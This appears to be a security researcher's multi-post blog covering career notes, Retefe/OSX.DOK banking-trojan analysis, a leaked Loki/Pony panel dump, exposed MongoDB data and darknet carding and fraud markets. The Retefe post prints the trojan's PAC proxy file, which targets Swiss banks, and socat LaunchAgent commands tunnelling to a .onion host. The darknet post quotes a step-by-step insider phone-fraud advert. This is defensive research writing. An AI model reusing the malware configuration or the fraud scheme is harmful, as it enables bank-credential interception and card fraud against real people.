Journey into Security - Part 2

I was fortunate enough to work with some incredibly talented people in my journey into security, who helped me understand difficult concepts, some of which I am still learning.

  • Cryptography
  • Windows Internals

Two skills I believe are absolutely key to working in security, because no matter where you go inside security you'll need an intimate understanding of both, so that's where I decided to start. I was working on user virtualisation software; this is, in essence, a reflection of roaming profiles, using some magic to ensure a consistent user experience across all platforms, including physical and virtual desktops, and not limited to stuff like published desktops from Citrix, VMware & Microsoft.

I furthered my understanding by buying a couple of books.

Internals

Learn that sh*t

I probably refer to at least one of these books once a week for a function or the parameter of a service, partially because I have a terrible memory. In that role, I was automating some of the work I was doing and came across tools like PsExec, Sysmon and the rest of the toolkit. So like any analyst, I automated some of my testing and began to explore the rest of the tools.

Process Monitor & Explorer - thank you, Mark and Bruce!

I used these to troubleshoot registry problems, identify login issues and generally understand what was happening during login. A low-level way of examining & testing bugs that I was trying to non-programmatically troubleshoot.

Little did I know that during the troubleshooting I would identify a malware infection in my own lab. I was able to track this down using some of the inbuilt filters, which captured the process running when I visited a certain site. This was the moment I knew I was interested in malware. I didn't have any idea what it was capable of, but I knew how to identify it and how to remove it.

Moving on

I was 'content' at the role I just mentioned, and had a passing interest in security, but became more and more fascinated by some of the articles being published online. I attempted a few CTFs and failed miserably; I didn't know what I was doing, and although I was curious, I took defeat very badly, and personally. I was persistent: I started visiting some forums and asking questions, I joined kernelmode.info and started reading the content, copying and learning. I also learnt of Lenny Zeltser as part of my research and found this, which was at version 5 I think when I discovered it, and it included cheat sheets on taking apart malware! I was saved; I had step-by-step guides on using the tools I had watched, and learned a lot (Thank you, Lenny!)

I had a keen interest in attending FOR610 and joked 'I would give my first born to go'; the reason was that it was super expensive. I learnt an awful lot on this course and still refer to the course materials to this day. Both Lenny and his colleagues are incredibly helpful, approachable and clearly enjoy what they do.

I've spent a few years at Fujitsu now and learnt more than I can possibly write down here, but some of the highlights included working alongside great people, and being fortunate enough to work at the NCSC as part of the previous Fusion Cell, now known as Industry 100. I have represented Fujitsu on a number of occasions all over the world, and attended Black Hat & DEF CON. Speaking at conferences on behalf of my employer is something I am incredibly proud to do, and something which impresses my daughter even more, which is all that matters.

Giving back

I have the opportunity to share what I know and have learnt. This kind of opportunity is something that gives me an incredible feeling of gratitude, knowing I am assisting those who need to learn, like me. I forever refer to myself as a 'noob', because when you realise you know everything, you realise you know nothing. The opportunity in question is working alongside some talented people at CTU in Prague on a project called CivilSphere, working remotely to protect the vulnerable from being targeted. I have always been impressed by the work done by the likes of Citizen Lab and was inspired to try and be part of this protection network. I am very thankful to Sebas for this opportunity, and to all the talented people at CivilSphere.

Next Steps

I will be leaving Fujitsu in a few weeks, to start a new role at Proofpoint. I look forward to learning more interesting concepts, and being a noob all over again.

Journey into Security - Part 1

I consider myself a noob, forever asking simple questions. Just how does DNS work? WTF is a floating pointer? A lot of these questions were born out of curiosity, and a few people said they would be interested in hearing how I got into security. So I decided to write it down. It feels very much 'LOOK AT ME, HOW COOL I AM' and self-indulgent writing this, but that couldn't be further from the truth; I hate talking, or writing, about myself, but in light of the current state of security, and being considered a mentor to a few people and working with extremely bright people, I felt obliged.

I have loved computers ever since I can remember. I won't bore you to tears with my first computer because it's likely the same as most people my age, but here is a photo of it.

(Photo: BBC Micro)

2 MHz CPU

A shared computer at home, no games.

Fast forward a very long time to my teenage years and I was asked to help out at a family friend's place of work; they had high-speed scanning of documents (invoices, purchase orders etc.). I automated parts of this job and put a few people out of work (sorry). With this came the management of the storage of the scanned items, which came with the ability to identify secure methods of storage. At this point, an online presence was just emerging in terms of retail, so it wasn't really a consideration that at some point payments would need to be taken online and managed in an office and placed internally. So my curiosity led me to a device known as a domain controller (Windows 2003 SBS), which contained the following:

  1. DHCP
  2. DNS
  3. WINS

WTF was this, and what did they all mean? Well, I needed to understand what I was working with, so I quickly spent a lot of time on a place called TechNet. Before Microsoft released the useless bots to answer questions, it was a thriving community with a lot of answers and help. I learned the basics of network management here: understanding what a subnet was, and why it was important to track who was using what range, and why. (Think credit card processing.)

Now, I realised at the time that a lot of letters started to appear in the signatures of my peers (MCSE, CompTIA). I thought, what was this? A quick Yahoo! (yes, Yahoo!) search showed me that Microsoft was giving certifications to people who took tests, and with that came the letters! Cool, I thought; I was in my 20s and had not sat a test since school, and I did not go to university, so it was natural to try and test myself. That particular employer did not give me any training, so I had to leave and ended up at one job (I have missed out two roles here that do not have any impact on my journey into security). I ended up at a communications company, dealing with MPLS, leased lines, dedicated fibre links etc. Basically, the stuff that powers the internet & telephony.

My first job in this role was to 'map the network'. Wait, what? I didn't have the slightest idea where to begin. Routers? Switches? I was a Microsoft specialist and had sat away from networking because of dedicated resources. I had the opportunity to understand these things and did so quickly; I had a vague idea of the topology and was able to Visio a map in about 14 days. This was as much a test for me as it was for the company. We had:

  1. WAN Router(s) exposed by default auth
  2. Hardcoded credentials in reception for wifi
  3. Gold Images that had no updates applied for over 10 months

So at this point, I had access to an Active Directory with approx 3,00 users and mobile devices, computers which ran XP and a Windows 7 deployment upcoming. This was my job to manage, design and deploy. I was very scared. Computers were something I used, not something I knew what to make use of!

I was extremely fortunate to attend a Microsoft course which was titled 'Fast track to managing and maintaining an Active Directory domain 2003'. This course, 5 days away from my home in a strange city, taught me so much; I had 10 hrs a day exposed to an Active Directory domain that I built and could break and rebuild without the fear of a P45 arriving. I got further into some concepts that I had come across (DHCP, DNS, WINS) and some other more interesting concepts which ignited my interest further.

Security 

I had long been in awe of security specialists. I had only minor interaction with these superheroes; they usually worked in a firewall team, or some other amazing-sounding team, and would only appear when things were bad. So that was my interest: what DID these people do? Well, I quickly discovered that a set of ACLs on a firewall was not as interesting to me as managing a forest of objects for thousands of people, and understood securing Active Directory was much more interesting. I started to dig into Active Directory and, trying to understand further, I quickly learned about a few things:

  1. Active Directory is hard
  2. Active Directory is hard
  3. Active Directory is hard

Now the grizzled amongst us will say it's not. I completely disagree: the entire concept of Active Directory has been badly managed, and whilst it's now an entire attack surface and has brought to light some of the most incredible attack methods, there is very little in the blue team area of protecting Microsoft Active Directories.

So, after dedicating a few years to becoming a specialist* in Active Directory security, I moved on, to a role in the legal marketplace. I was protecting the assets of solicitors, a domain unlike any other I've ever worked in before. A difficult but challenging role, because the reliance on physical documentation for legal professionals restricted much of what is digitised.

Exams, Exams.

I was very boring for a few years, taking exams every few months.

One day, I arrived for work and was told I would be sent on an 'intervention'. This in the UK refers to a process whereby, when a legal practice is in distress, a member of the 'SRA' will intervene and take over; this included all electronic items. I was basically an IT bailiff.

I had managed antivirus solutions because nobody else would (who can blame them?), but quickly realised what a GOLDMINE of information was being identified. It was a pretty default policy (block, allow, delete, quarantine); the little friction it was generating was not worth the cost of renewals, so I changed it and applied it to different machines, using different policies depending on location and level of practice seniority. I didn't want to get the sack because a partner of the practice couldn't plug in the USB device he also used at home.

I was identified as a potential for the intervention 'because Bryan knows security'. Did I? Not really, but I did know how dangerous Office macros were and why IE6 really shouldn't be used. Let's go. Anyway, an 'encrypted database' was being used to store all client data and we needed it to be able to 'take on the cases'. The 'encrypted database' was a Microsoft Access database; it was trivial to crack, made even easier by the fact the password was stored in passwords.txt in the same directory.

Anyway, I was hailed as a saviour and, even though no laws were broken, that resulted in a lot of money being earnt, and my value rising too (all because of a password policy?).

So I was given access to be able to deploy my OWN antivirus policies as a result of some good work around 'finding passwords in directories called passwords'. I had shown interest, so there we go.

I deployed extremely restrictive policies to execs, so much that they complained. I updated device controls to prevent data loss via mobile phones and USB sticks, and identified the malware as a result of this and thought 'well, this is cool, I'm using something someone hates to hear about to find all this bad stuff, who wouldn't be interested in this?!' Turns out it was only me, and this is where my security passion was really born.

Hello, Pentester 

Fast forward a few months and I received an alert from my very restrictive policy alerting me to someone running passwordump.exe on my domain controller. Not only did I lay a very small egg in my pants, but I was worried, because the domain controller was a honeypot. I had deployed a few domain controllers in the sense that they advertised the services to a would-be attacker but contained no actual resources. A modern-day RODC, before RODC was a thing. Turns out we had a 'black box' pen test which the manager was aware of. I quickly identified the pen tester in a room he had 'walked into' and plugged into a telephone port, identified the DHCP range as being broadcast from my 'domain controller', and that's all: I just named the server DOMAIN CONTROLLER, and no ntds.dit was enough to attract the attention of his toolkit. The server was only running DHCP.

Anyway, I tried to take control of his session, and this image made it into the eventual pen test report as a way of positive feedback on deception.

LOL no

What does this button do?

I moved on from that role. As my passion for security grew I moved to a company that was responsible for user virtualisation. I learned more here about user profiles than I can ever forget: the stages of authentication involved in a login, the handshake and, crucially, the concepts around Kerberos and NTLM. I had a core understanding of authentication and the reliance on trust for authentication, and with this came a more curious-minded approach. I worked with extremely talented developers and students who were driven by curiosity in an academic sense; I was purely trying to learn and stop being a noob. I was in a QA team, a bug hunter! Sadly, the only bugs that drew attention were not 'this button works' but the storing-of-plain-text-passwords-in-SQLite-databases kind of bugs. Along with this came the realisation that I should be documenting every single thing I ever needed to know in a physical form, so I bought Moleskines.

Lots of them.

Notes

Write that sh*t down

As I've written here, I have realised a second part will be much more interesting than one long boring post. It will include more of the recent stuff: a failed CISSP study attempt, how I identified bugs before bug bounties were cool & some malware stuff.

Panel party - Loki, Pony.

Hunting via Hybrid Analysis, I identified persistent offender(s) storing content on a panel. I kept my eye on it for a while, and when it was busy enough, I managed to get the entire server configuration for the panels.

Wallet stealer
  1. Loki admin
  2. Pony admin

Usernames, passwords for MySQL and database configurations, over 100 lists of target applications, BTC wallets, FTP clients, browsers, games.

The most interesting thing for me was that Loki has a POS module.

Here are the contents; ping me if it becomes unavailable.

  • https://drive.google.com/open?id=1l3vcGBnbknVhu-Fe6KZ5XB9LLEYx8Pua
  • SHASUM: 591cc7fe34d5cd76c7bd8be4ee9d94741e293946

Have fun.

Russia v Ukraine : A primer for the uninitiated

Russian intervention in Ukraine, be it military or 'cyber', has historically been something of a strategic playground. Whilst other attacks observed are more 'noisy', or disruptive, the ongoing incidents can be, and will be, attributed to Russia. If, like me, you're a scholar of the aspects of cyber incidents, particularly when it comes to Russia v Ukraine, experts will quickly identify and theorise that they are the work of the shadowy Russian bear(s).

My own learning has focused on 'why', and I've digested and recommend the following:

  1. The 'ultimate' guide, in my humble opinion, is here: Russia v Ukraine, Kenneth Geers.
  2. APT28, or depending on the vendor:
    Pawn Storm,
    Sofacy Group,
    Sednit,
    STRONTIUM,
    Tsar Team,
    Threat Group-4127,
    Grizzly Steppe (when combined with Cozy Bear). The important part to note here is that APT28 is widely believed to be GRU, and the GRU is explained in detail here.
  3. APT29 or Cozy Bear, again depending on the vendor, may be called any of the following:
    Office Monkeys,
    CozyCar,
    The Dukes,
    CozyDuke,
    Grizzly Steppe (when combined with Fancy Bear)

This is the best infographic I have seen explaining the process of APT28/29 activity.

(Infographic: APT28/APT29 techniques, spear-phishing)
There are a breathless number of analysts capable of dissecting the incidents that occur within Ukraine's borders, and often more who offer bullet quotes seeking to encourage fear, uncertainty and doubt, AKA FUD. My experience is of working with some extremely talented analysts, both in government and at F500 companies, who actively avoid headline-grabbing and offer comments by way of research and analysis. Robert M. Lee explicitly called out this type of behaviour and asked people to 'stick to the facts'.

The concept of 'hackers' knocking out power in a country is one which evokes a large number of reactions, I look to people like Robert M. Lee for measured and sensible analysis, as should you - if your number one source for information is mainstream media, you won't get insights, you'll get clickbait.

With that in mind, the elephant in the room is the 2016 US election, something which those not directly involved in intelligence, be it cyber or policy, will still be closely unpicking. I recommend the following content for insights into how the 'fake news' (and I still can't say that phrase with a straight face) helped undermine the political agenda.

Some of these are incredibly long-winded and contain quite a lot of personal sentiment, but if you can decipher that and understand the underlying theme, that disinformation played a significant part in the U.S. election, you'll understand what a weapon social media has become and why, as a 'Cyber Threat' analyst, you'll be required to pay extremely close attention to it.

Cambridge Analytica

https://medium.com/join-scout/the-rise-of-the-weaponized-ai-propaganda-machine-86dac61668b

tl;dr: big data manipulated everyone.

The Plot to Hack America by Malcolm Nance

https://en.wikipedia.org/wiki/The_Plot_to_Hack_America

tl;dr: coincidence takes a lot of hard work. Also, Russia sought to manipulate the election by way of a number of methods, including social media propaganda, hacking of DNC emails and strategically placed adverts.

Is Ukraine the Test Lab for Russian - Wired

https://www.wired.com/story/russian-hackers-attack-ukraine/

tl;dr: attackers gained access to critical systems; excellent analysis from Dragos here.

Retefe v OSX.DOK Part 2

Last month I had some time to look at the latest iteration of OSX.DOK/Retefe for macOS, and thanks to Jaromir from Avast and the excellent VB presentation, I can conclude they are almost identical. The reasons for this include the following:

From the presentation at VB, Avast noted:

Below is a collection of some of the recent samples collected from Swiss campaigns targeting OSX victims.

The payloads are being signed with developer certificates, presumably stolen, which enable them to bypass the macOS security feature known as Gatekeeper. It's not clear how these accounts are being used or if they are using pseudonyms to prevent suspicion; below are some samples. You can use the codesign command with the relevant parameters to identify the signing status of the app bundle.

Masquerading as trusteer.app

All macOS apps need a manifest file known as Info.plist, which includes a MachineOSBuild key. In this case it was 13F1911, which is commonly known as OS X Mavericks, meaning the build machine was likely a virtual machine or the developer has an older OS.

The samples are UPX packed 

(Screenshot: UPX-packed sample)

I've just uploaded a single sample for researchers to analyse; however, Apple is actively investigating the misuse of these certificates.

https://www.virustotal.com/en/file/80634e7b69f77825e5316e046c5a08c70b9950123845ef9a54a1abb9d8acb9a9/analysis/1495058845/

  • 11/05 notified Apple Security
  • 13/05 incident confirmed with Apple Security
  • 17/05 shared developer identities with Apple

Retefe and OSX.DOK - One and the same?

A few vendors announced a malware family known as OSX.Dok which targeted OSX, using strikingly similar methods to those I had seen used by Retefe. Having observed some of the configuration changes recently, this seemed too similar to be a simple coincidence.

For those unfamiliar, Retefe is a trojan, and numerous configurations exist which usually target most EU banks, the United Kingdom and France, but the real targets in my own experience have been Germany and Switzerland. This article last week identified Germany but included a Swiss screenshot by Check Point here, so it's slightly confusing.

The part of Retefe which struck me as similar was the proxy auto-config (PAC) .js file the trojan uses to identify the range of banking sites it wants to intercept:

function FindProxyForURL(url, host) {
    var proxy = "PROXY paoyu7gub72lykuk.onion:88;";
    var hosts = new Array('*.postfinance.ch', 'cs.directnet.com', '*akb.ch',
        '*ubs.com', 'tb.raiffeisendirect.ch', '*bkb.ch', '*lukb.ch',
        '*zkb.ch', '*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch',
        '*bcge.ch', '*raiffeisen.ch', '*credit-suisse.com', '*.clientis.ch',
        'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', '*baloise.ch',
        'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch', '*eek.ch', '*szkb.ch',
        '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch',
        '*bcf.ch', 'ebanking.raiffeisen.ch', '*bcv.ch', '*juliusbaer.com',
        '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',
        '*valiant.ch', '*wir.ch', '*bankthalwil.ch', '*piguetgalland.ch',
        '*triba.ch', '*inlinea.ch', '*bernerlandbank.ch',
        '*bancasempione.ch', '*bsibank.com', '*corneronline.ch',
        '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',
        '*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch',
        '*hbl.ch', '*ersparniskasse.ch', '*ekr.ch',
        '*sparkasse-dielsdorf.ch', '*eki.ch', '*bankgantrisch.ch',
        '*bbobank.ch', '*alpharheintalbank.ch', '*aekbank.ch',
        '*acrevis.ch', '*credinvest.ch', '*bancazarattini.ch', '*appkb.ch',
        '*arabbank.ch', '*apbank.ch', '*notenstein-laroche.ch',
        '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch',
        '*bordier.com', '*banquethaler.com', '*bankzimmerberg.ch',
        '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',
        '*banquecramer.ch', '*banqueduleman.ch', '*bcpconnect.com',
        '*bil.com', '*vontobel.com', '*pbgate.net');
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy
        }
    }
    return "DIRECT"
}

and, from the OSX version, the following LaunchAgents:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

You'll note the .onion site in question is present both in this configuration and in the article discussed above. Additionally, the similarities continue:

Retefe                    OSX/Dok
Root certificate          Root certificate
Proxy hijacking           Proxy hijacking
paoyu7gub72lykuk.onion    paoyu7gub72lykuk.onion
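As an added example (not code from the original post or from either malware family), a small Python triage helper that does what the comparison above does by hand: it extracts the proxy endpoint and host-pattern list from a Retefe-style PAC, mirrors the PAC shExpMatch() glob with fnmatch so you can test which hostnames would be hijacked, and checks whether the PAC and the socat LaunchAgent command lines name the same .onion service. The PAC text is an abbreviated, constructed copy of the one quoted above; the socat lines are the two quoted above.

```python
import re
from fnmatch import fnmatchcase

# Constructed sample: an abbreviated copy of the FindProxyForURL() PAC quoted above.
SAMPLE_PAC = r"""
function FindProxyForURL(url, host) {
    var proxy = "PROXY paoyu7gub72lykuk.onion:88;";
    var hosts = new Array('*.postfinance.ch', 'cs.directnet.com', '*akb.ch',
        '*ubs.com', 'tb.raiffeisendirect.ch', '*zkb.ch', '*credit-suisse.com');
    for (var i = 0; i < hosts.length; i++) {
        if (shExpMatch(host, hosts[i])) {
            return proxy
        }
    }
    return "DIRECT"
}
"""

# Constructed sample: the two socat LaunchAgent command lines quoted above.
SAMPLE_LAUNCH_AGENTS = [
    "/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 "
    "SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050",
    "/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 "
    "SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050",
]

# v2 onion names are 16 base32 chars, v3 names are 56; both use only a-z and 2-7.
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b")
# The PAC returns a string such as "PROXY host:port;" for hijacked hosts.
PROXY_RE = re.compile(r'"PROXY\s+([^";\s]+)')
# The host patterns live in a single new Array(...) literal of quoted strings.
HOSTS_RE = re.compile(r"new Array\((.*?)\)", re.S)
QUOTED_RE = re.compile(r"'([^']*)'")


def parse_pac(pac_text):
    """Return (proxy endpoint or None, list of host glob patterns) from a PAC."""
    proxy = PROXY_RE.search(pac_text)
    hosts = HOSTS_RE.search(pac_text)
    return (
        proxy.group(1) if proxy else None,
        QUOTED_RE.findall(hosts.group(1)) if hosts else [],
    )


def sh_exp_match(host, pattern):
    """Stand-in for the PAC shExpMatch() glob: '*' and '?' wildcards, case-insensitive."""
    return fnmatchcase(host.lower(), pattern.lower())


def intercepted_hosts(pac_text, hostnames):
    """Hostnames the PAC would route through the proxy instead of returning DIRECT."""
    _, patterns = parse_pac(pac_text)
    return [h for h in hostnames if any(sh_exp_match(h, p) for p in patterns)]


def onion_services(*texts):
    """Set of .onion service names mentioned anywhere in the given texts."""
    return {m.group(0) for text in texts for m in ONION_RE.finditer(text)}


def share_onion_service(pac_text, agent_cmds):
    """True when the PAC proxy and the socat forwarders name the same hidden service(s)."""
    pac_onions = onion_services(pac_text)
    return bool(pac_onions) and pac_onions == onion_services(*agent_cmds)


if __name__ == "__main__":
    proxy, patterns = parse_pac(SAMPLE_PAC)
    print("PAC proxy:", proxy, "| host patterns:", len(patterns))
    probe = ["www.ubs.com", "e-finance.postfinance.ch", "postfinance.ch", "www.example.com"]
    print("intercepted:", intercepted_hosts(SAMPLE_PAC, probe))
    print("PAC and LaunchAgents share an onion service:",
          share_onion_service(SAMPLE_PAC, SAMPLE_LAUNCH_AGENTS))
```

Note that '*.postfinance.ch' does not match the bare apex 'postfinance.ch', while '*ubs.com' matches anything ending in 'ubs.com'; the glob semantics matter when deciding which hosts a given configuration actually hijacks.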

Banking trojans have been at the forefront of media for a while, and the revenue they generate is clearly attractive to criminals, and to law enforcement, as demonstrated recently both here and here.

#MongoDB - A dumpster fire of cry laughter

Thankfully, there has been a lot of interest in MongoDB over the past few weeks. It's not a new problem; however, the more people report on it, the more C-level people will ask the question 'where is my MongoDB?'

John Matherly originally wrote about this in 2015. This entry has since been resurrected and will no doubt be resurrected again in another 12 months. Significant media outlets are taking note of this extortion practice, and for me, whilst painful for the victims, this is simply part of the stratagems associated with online survival.

There are circumstances in which you must sacrifice short-term objectives in order to gain the long-term goal. This is the scapegoat strategy whereby someone else suffers the consequences so that the rest do not.
— https://en.wikipedia.org/wiki/Thirty-Six_Stratagems#Sacrifice_the_plum_tree_to_preserve_the_peach_tree

So, with this in mind, let's take a look at the data currently available as of 05/01/17. Data will be redacted; I don't want the responsibility of dealing with the consequences if they are eventually extorted.

  • Job site

IP address, location, current job title

  • Health data

Passwords, DOB, weight, height, phone number, diabetic status, last login IP

  • An Android .APK backend for tracking users of a satellite app

Some further data included network type, i.e. 3G, 2G

The Money Team - A multinational fraud gang

The thriving carding forums that reside under .ru or .su domains offer a significant number of diverse fraud options, ranging from simple carding fraud using dumps or CVVs. I identified 'The Money Team' by way of their preference for offering what are known as pink slips.

Pink slips are better known as the forms used in financial dealings, and in particular by insurance firms. The fraudulent forms offered here target the following:

  • Alpha Insurance
  • CSG
  • FAC
  • Ingosstrakh - A Moscow-based entity with financial stability rating of A++

They offer a substantial amount of documentation via a DNM at the following prices, which are competitively priced on a sliding scale depending on the amount purchased, i.e. the more slips, the lower the cost.

  • 1 completed application form - 2500r
  • 10 letterheads - 900p 
  • 20 forms - 870r 
  • 30 forms - 850r 
  • 50 forms - 700r 
  • 100 forms - 650r 
  • 300 forms - 550r 
  • 500 forms - 500r 
  • 1000 forms - 450r 
  • 5000 forms - 400r 
  • 10000 forms - 380r

As a potential buyer of the documents you can request a sample; a reputation as a buyer is required, and if you're feeling adventurous you can ask for a courier such as SDEK/DIMEX/CSE.

Branching out and diversification of a criminal enterprise are key to success, and the soon-to-be-launched tmtdocs.com site offers a direct link to their trades.

The site unsurprisingly sits behind Cloudflare.

I will be paying close attention to what other services pop up from TMT.

2016 a year in Review

Goodbye 2016

A year in security is a considerable amount of time; the number of breaches, attacks and disclosures has been almost non-stop, and we're not finished yet. I have listed below some of the most notable 'cyber' incidents which caught my eye for a number of reasons.


  • HSBC Bank attacks - January
  • Operation Dust Storm - February
  • DROWN vulnerability - March
  • Panama Papers - April
  • RDP brute-forcing - May
  • Democratic Party hack - June, and of course the disappearance of Angler around the same time, and NATO recognising cyber as a '5th domain of warfare'
  • xDedic forum - July
  • ShadowBrokers 'dump' - August
  • Brian Krebs DDoS attack - September, and the Congressional oversight committee releasing its report on the OPM breach
  • Trickbot - October
  • Three data 'breach' - November
  • Avalanche takedown - December. Bonus: video footage of the arrest here

No real surprises for those in the trenches of security. I've missed out some of the more 'media friendly' stories as cyber became front page news this year, with every DDoS and breach impacting those who have zero idea how the incident will have occurred. Typically cloudy responses from the organisations affected do not help the affected or, more importantly, the victims.

What are companies doing to ensure this doesn't happen to them? The basics, plus the advanced intelligence-led security endeavours to look for the potential attack vectors and methods being used elsewhere and derive intelligence from them. But the fact is most attacks are NOT sophisticated. This phrase is only tagged onto those incidents that make front page news, or as I call them, the BBC factor. I am a big fan of @thegrugq; for one, his clarity of tone on security along with his razor wit is good to see in security. He is a poster boy for security snark and backs it up with proof.

The ultimate being this tweet:

New rule: if you are hacked via OWASP Top 10, you’re not allowed to call it “advanced” or “sophisticated.”
— https://twitter.com/thegrugq/status/658991205816995840

And he is so right. Tesco may have been hacked by a vulnerability in the back office system, or an insider threat offering access to his terminal for transactional access, but the fact remains few of the breaches above were 'sophisticated':

  1. xDedic - bruteforcing RDP sessions
  2. Three Data incident - insider
  3. Panama Papers - SQL Injection
  4. Brian Krebs DDoS attacks - hardcoded passwords and insecure protocols in CCTV and DVR systems
  5. OPM breach - ignorance of the clear threats and lack of understanding from top to bottom, which resulted in the Oversight report and the person at the top losing her job.

2017 predictions are here, and I'm totally serious

Security predictions for 2̶0̶1̶7̶ 1998
1. Macro malware
2. MD5 passwords
3. Companies threatening security researchers for disclosures.
— https://twitter.com/Bry_Campbell/status/810091303417610240

#Dridex has big ambitions..

Dridex, Dridex. The bane of so many people's lives. Mine included. It has been 'quiet'; I made a post in the hope it had gone away. It had not. It has returned with a couple of new botnet IDs, 144 and another, 1024, which I am still working on.

Includes a list of interesting targets.

The interesting part is the 'sgoldtrakpc' part, which leads to this conclusion:

FPS GOLD provides core processing and eBanking software for community banks across the United States. We offer the solution to all of your banking challenges—including ever-changing regulations and security threats. And the FPS GOLD solution is fully integrated, saving you time and money.
— http://www.fps-gold.com/about.aspx

The sample Matt posted and the one I was analysing both included a comprehensive list of commercial banking applications, and also an improved list of enterprise applications. The list is here; see the comments for the full list.

Samples used in analysis here & here

Incidentally, Dridex has historically been delivered by a macro-enabled document. Microsoft recently backported a good solution for blocking these from downloading malicious payloads (https://support.microsoft.com/en-us/kb/3115427), but it was exclusive to Office 2016. Thankfully, it's now in Office 2013! Please install this patch ASAP.

Going shopping on the Dark web

I've recently learnt the impact of what we, the 'entrenched', take as the norm. Case in point:

To the vast majority of security people, this is not 'news', but that doesn't take away the fact that this is equally important to those affected. Graham Cluley also has some thoughts on it here:

But what hackers frequently do these days is use a technique known as “credential stuffing” - taking the information they have stolen from one site, using it to log into another site, and then using any information they gather on any accounts they manage to access to gather additional personal information which could be used for fraud.
— https://www.grahamcluley.com/2016/07/yes-data-breach-really-fault/

So with that in mind, I thought I would demonstrate what is available on one of the more popular 'Darknet Markets'. A primer on that area is here.

Firstly, some markets are quite accessible; a good list is here. There is an exception to the rule for some markets that do require a deposit, or a cosign from someone legitimate enough to 'vouch' for you.

What can I buy?

Lots. You can usually identify the interesting things in much the same way as on most auction sites, by way of feedback. A quick rundown of some of the items, physical and virtual, and the services associated with them is below.

  • Banking

I wrote about muling here, but the services used in between these are not limited to muling; there are also:

  • Carding Services - Hotel fraud, such as booking services and Ticketmaster gift cards.


Damaging to the brand associated with the theft & fraud.

  • Bank Account transfers - Often taken from compromised devices or botnet-owned machines.


  • British Airways accounts - Often from RAT-infected machines.


  • Weapons - Yes, you can order a weapon from the internet.


Personal information is a commodity in itself, and arguably the most valuable; however, its value depends on those who can best use it to gain the most profit. It's for sale here too, as mentioned in relation to the original O2 article.

The insider threat is something which is gaining a lot of attention and will only grow as an exponential threat to businesses who do not understand the concept.

This advert offers insiders in all of the UK's most popular phone stores:


Boggalertz - Best Seller in the world, just wait and see.

Please read this carefully************

To take advantage of these profiles you will need the following
1) An insider in any phone shop
2) A credit or debit card, which you know the pin and registered address for
3) there must be at least £10 on the card
4) This is for UK only

Heres how it works.......
* You send me the door number and the postcode of the registered card, EXCLUDING the LAST 2 LETTERS. ( SO I DON’T EVER KNOW THE ACTUAL ADDRESS)
* I will send you back a profile which will pass for mobile phones in ANY phone shop, providing you use the correct card
*You go to your insider and place orders for as many handsets as you can get your grubby little mitts on
*You leave me nice feedback and tell the world that BOGGALERTZ is the worlds best seller!

—————————————————————————————
You will need an insider because of 2 reasons
1) the DOB may not match what you or your striker looks like
2) the name will not match the name on the card (which I will never know)


Again, to the majority of the security community this is not a 'new' concept. However, encouraging mainstream media to take an active interest in this will highlight its availability and ensure that those at risk are better educated and understand the risks.

Tools of the trade: An intro.

I received an email from someone just starting out in security as a chosen career path who had bought a laptop to use purely for research. I don't particularly advocate any one laptop over another; I use a *MacBook for two reasons:

1. Resale value

2. The screen is amazing, and my eyesight is getting progressively worse.

I dumped a list of my tools and was surprised at just how much I had customised my device.

  • KnockKnock from Patrick Wardle, along with a lot of his other tools, is available here. "KnockKnock... Who's There?" See what's persistently installed on your Mac. KnockKnock uncovers persistently installed software in order to generically reveal malware.
  • Little Snitch - Essentially a firewall, but with usability.
  • Hopper - Disassembler for x86/x64 RE. Not free.
  • Radare - Another disassembler, my personal preference.
  • Brew - It's amazing OSX comes without half these tools, but you'll quickly realise you need them.
  • Shodan command line - As above, it really is part of everything I do.
  • Olevba - Excellent parsing for OLE files, usually MS Office.

As an addendum, there is a brilliant 'hardening guide' for OSX here.


N O T E: this is for beginners; as a more seasoned security researcher you're probably used to seeing these tools and probably shouldn't be reading this.

*Other excellent laptops are available.

Inside an international Carding shop

There is a worldwide trade in stolen or compromised credit cards, which often end up in the hands of a few criminals who, instead of attempting to spend the money themselves, choose to sell the data to those who can better 'cash out' and move the proceeds into account(s) that essentially launder the cash. Muling and laundering reports from Europol are here and here.


Support manager shop (English) Please contact : ICQ ID : 684523892 Email : [email protected] Yahoo : Chim_ThaiLan

The ICQ number 684523892 is associated with a large number of results, all related to the trading of stolen/compromised credit card details. One such shop offers significant coverage, including the US, China & the EU.

There are two types of cards, referred to as 101 and 201:

201 = Larger limits and no regional restrictions, but requires chip verification.

101 = Restricted limits (preferred by criminals and those learning the carding game) and not chipped.

The rough translation of 'Chim_Thái_Lan' is 'Birds of Thailand', which could be a reference to the location of the carding operation in Asia. The shop offers assistance in both Thai & English, working between the hours of BST and Thai time (+6). When I asked for the rates and promised to purchase, I was presented with the following:

Thank u for interest!! rates below and promise value (:

  • DUMPS 101 Track1+Track2+PIN.
  • DUMPS 201 Track1+Track2+Track3+PIN.
  • Daily update.
  • Fast automatic payment methods
  • Replace lost/stolen/hold/card error/call
  • Replace if the card balance is less than $1,000
  • Balance > 1,000 - 100,000 EUR/USD
  • Lowest prices at a stuff of such quality.
  • After purchase you will have 3 days to check
  • Refunds
  • 100% GUARANTEE WORK
  • Support 24/7

